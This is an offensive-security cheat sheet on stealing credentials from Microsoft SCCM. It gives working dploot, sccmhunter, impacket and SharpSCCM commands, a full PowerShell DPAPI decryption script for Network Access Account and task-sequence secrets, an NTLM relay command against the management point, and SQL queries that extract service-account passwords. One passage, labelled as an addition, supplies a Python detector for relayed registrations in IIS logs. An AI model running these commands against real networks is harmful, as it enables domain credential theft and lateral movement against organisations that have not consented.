SCCM Credentials

05.06.2024 · dadevel

Credential Access on SCCM-managed computers.

The Network Access Account (NAA) is a domain account that SCCM clients which are not yet domain-joined use to retrieve content from SCCM. Therefore every SCCM-managed computer knows its password. Credentials of the current and previous NAAs can be found on disk, even after SCCM has been migrated from NAA to Enhanced HTTP.

Furthermore, Task Sequences nearly always contain the credentials of a "domain joiner account", which is often the owner of every computer it ever joined to the domain.

From client

Dump NAA credentials, Task Sequences and Collection Variables remotely from disk as local admin.

dploot sccm -d corp.local -u jdoeadm -p 'passw0rd' ws01.corp.local

Dump NAA credentials, Task Sequences and Collection Variables remotely from WMI as local admin.

dploot sccm -wmi -d corp.local -u jdoeadm -p 'passw0rd' ws01.corp.local

Support for task sequences and collection variables was added with PR 49.

sccmhunter dpapi -d corp.local -u jdoeadm -p 'passw0rd' -target ws01.corp.local

Dumps only NAA credentials. Requires PR 1137.

impacket-systemdpapidump -sccm corp.local/jdoeadm:'passw0rd'@ws01.corp.local

Dump NAA credentials, Task Sequences and Collection Variables locally as local admin.

Extract the current and previous encrypted password blobs by searching for PolicySecret in C:\Windows\System32\wbem\Repository\OBJECTS.DATA. The file is world-readable, but decryption requires system context.

Instead of parsing OBJECTS.DATA, the current blobs can also be retrieved from WMI.

Add-Type -AssemblyName System.Security

# Decrypt a hex-encoded PolicySecret blob with the machine DPAPI key.
# The 4-byte header in front of the DPAPI blob is skipped.
function Decrypt($hexblob) {
    $byteblob = New-Object -TypeName byte[] -ArgumentList ($hexblob.Length / 2)
    for ($i = 0; $i -lt $hexblob.Length; $i += 2) {
        $byteblob[$i / 2] = [System.Convert]::ToByte($hexblob.Substring($i, 2), 16)
    }
    [System.Text.Encoding]::ASCII.GetString([System.Security.Cryptography.ProtectedData]::Unprotect($byteblob[4..($byteblob.Length - 1)], $null, 'LocalMachine'))
}

# Pull the hex blob out of the <PolicySecret> XML wrapper.
function ExtractSecret($text) {
    ([xml] $text).PolicySecret.InnerText
}

echo 'Network Access Account:'
$naa = Get-WMIObject -Namespace 'root\ccm\Policy\Machine\ActualConfig' -ClassName CCM_NetworkAccessAccount
# more than one NAA may be configured
foreach ($acct in $naa) {
    Decrypt (ExtractSecret $acct.NetworkAccessUsername)
    Decrypt (ExtractSecret $acct.NetworkAccessPassword)
}

echo 'Task Sequences:'
$ts = Get-WMIObject -Namespace 'root\ccm\Policy\Machine\ActualConfig' -ClassName CCM_TaskSequence
# more than one task sequence may be assigned
foreach ($seq in $ts) {
    Decrypt (ExtractSecret $seq.TS_Sequence)
}

echo 'Collection Variables:'
$cv = Get-WMIObject -Namespace 'root\ccm\Policy\Machine\ActualConfig' -ClassName CCM_CollectionVariable
# check manually
$cv

The same via SharpSCCM:

.\SharpSCCM.exe local secrets -m disk
.\SharpSCCM.exe local secrets -m wmi

Search for sensitive files under C:\Windows\CCM\ScriptStore as SYSTEM.


From SCCM server

Retrieve NAA credentials from SCCM if you control a computer account.

sccmhunter http -debug -d corp.local -u jdoe -p 'passw0rd' -cn 'hackerpc$' -cp 'passw0rd' -dc-ip dc01.corp.local
sccmhunter http -debug -d corp.local -u jdoe -p 'passw0rd' -cn 'hackerpc$' -cp aad3b435b51404eeaad3b435b51404ee:$nthash -dc-ip dc01.corp.local


Retrieve encoded secrets.

.\SharpSCCM.exe get secrets -mp sccmmp01.corp.local -sc CRP --username hackerpc$ --password 'passw0rd' -r hackerdevice1

The command can be executed from a non-joined computer.

Retrieve NAA credentials from SCCM by coercing a computer over SMB and relaying its authentication to the SCCM server.

Requires PR 1425.

impacket-ntlmrelayx --no-http-server --no-raw-server --no-wcf-server -smb2support --sccm --sccm-sleep 10 --sccm-fqdn sccmmp01.corp.local --sccm-server sccmmp01 --sccm-device hackerdevice1 -t http://sccmmp01.corp.local/ccm_system_windowsauth/request

Use DeobfuscateSecretString.exe from SharpSCCM to decode the naapolicy.xml.
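A detection-side complement, added here and not part of the original notes: a relayed registration reaches /ccm_system_windowsauth/request on the management point authenticated as the coerced computer account but from the relaying host's IP, so the MP's IIS logs can be checked for one source IP registering as several machine accounts, or one machine account appearing from several IPs. The W3C field layout and the sample log lines are constructed for illustration and must be adapted to the real log format.

```python
"""Flag registrations on the SCCM management point that look relayed.

Added example, not part of the original notes. Field names and sample lines
are constructed; real IIS logs on the MP may use a different field set.
"""
from collections import defaultdict

# Constructed sample: ws01 registers from its own IP, then 10.0.0.99
# registers as three different machine accounts, one of them ws01's.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time cs-method cs-uri-stem cs-username c-ip sc-status
2024-06-05 08:00:01 POST /ccm_system_windowsauth/request CORP\\WS01$ 10.0.1.11 200
2024-06-05 08:00:05 GET /SMS_MP/.sms_aut - 10.0.1.11 200
2024-06-05 08:02:10 POST /ccm_system_windowsauth/request CORP\\WS07$ 10.0.0.99 200
2024-06-05 08:02:31 POST /ccm_system_windowsauth/request CORP\\FS02$ 10.0.0.99 200
2024-06-05 08:03:00 POST /ccm_system_windowsauth/request CORP\\WS01$ 10.0.0.99 200
"""

TARGET = "/ccm_system_windowsauth/request"


def parse_w3c(text):
    """Yield one dict per entry, taking column names from the #Fields: header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))


def suspicious_registrations(text, max_accounts_per_ip=1):
    """Return (ips, accounts): source IPs that registered as more than
    max_accounts_per_ip distinct computer accounts, and computer accounts
    seen registering from more than one IP. A genuine client does neither."""
    by_ip = defaultdict(set)
    by_account = defaultdict(set)
    for e in parse_w3c(text):
        if e.get("cs-uri-stem") != TARGET or e.get("cs-username", "-") == "-":
            continue
        by_ip[e["c-ip"]].add(e["cs-username"])
        by_account[e["cs-username"]].add(e["c-ip"])
    ips = {ip: sorted(a) for ip, a in by_ip.items() if len(a) > max_accounts_per_ip}
    accounts = {a: sorted(i) for a, i in by_account.items() if len(i) > 1}
    return ips, accounts


if __name__ == "__main__":
    print(suspicious_registrations(SAMPLE_LOG))
```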

Other tools:

  • sccmwtf, used internally by sccmhunter


On management point

Extract credentials from the WMI store as local admin.

Get-WmiObject -Class SMS_SCI_Reserved -Namespace ROOT\SMS\site_CRP

On site database

Dump task sequences from the site database server and decode them with DeobfuscateSecretString.exe.

USE CM_CRP;
SELECT Name, Sequence FROM vSMS_TaskSequencePackage;
SELECT Name, Sequence FROM vSMS_TaskSequencePackageEx;
SELECT Name, Sequence FROM TS_TaskSequence;

Dump encrypted credentials of SCCM service accounts from the site database server and decrypt them with sccmdecryptpoc.cs on the primary site server.

USE CM_CRP;
SELECT UserName, Password FROM SC_UserAccount;

If the site database is installed on the primary site server, you can use SQLRecon.

.\SQLRecon.exe /auth:WinToken /host:SCCMSS01 /database:CM_CRP /module:sDecryptCredentials
